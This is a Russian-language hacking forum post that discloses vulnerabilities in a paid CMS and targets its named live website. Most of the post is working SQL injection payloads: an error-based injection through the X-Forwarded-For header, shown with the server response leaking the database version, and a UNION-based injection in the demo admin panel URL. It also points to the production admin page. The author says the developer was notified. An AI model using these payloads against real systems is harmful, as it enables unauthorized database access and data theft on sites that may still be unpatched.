17.01.2013, 03:26
|
|
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами:
7670486
Репутация:
76
|
|
Платная модульная cms. Множественные уязвимости. До исходников добраться не получилось для полноценного репорта, поэтому только самое критичное(хотя и не особенно ее покупают, судя по всему ).
sql-inj в каком-то из скриптов сбора статистики.
Request Headers:
Host:www.jcms.ru
X-Forwarded-For: 127.0.0.1')on duplicate key update h=(select 1 from(select count(*),concat((select(select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)h)#
Response Content:
Software error:
DBD::mysql::st execute failed: Duplicate entry ' 5.0.901' for key 1 at /MySQL.cgi line 12.
sql-inj в демо-админке:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//demo.jcms.ru/cgi-bin/admin.cgi?login=demo&password=demo&action=photogallery_photogallery_edit&JCMSPhotoGalleryAlbumId=-3' union select 1,version(),3,4,5,6,7,8,9,10+--+h[/COLOR][/COLOR]
Главная админка http://jcms.ru/cgi-bin/admin.cgi
Разработчик уведомлён, реакции не последовало. |
|
|